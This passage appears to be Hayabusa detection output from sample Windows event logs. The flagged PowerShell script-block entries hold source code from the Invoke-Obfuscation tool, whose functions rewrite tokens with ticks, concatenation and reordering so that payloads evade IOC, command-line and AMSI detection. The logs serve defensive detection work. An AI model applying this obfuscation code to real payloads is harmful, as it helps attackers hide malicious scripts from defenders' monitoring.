Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand 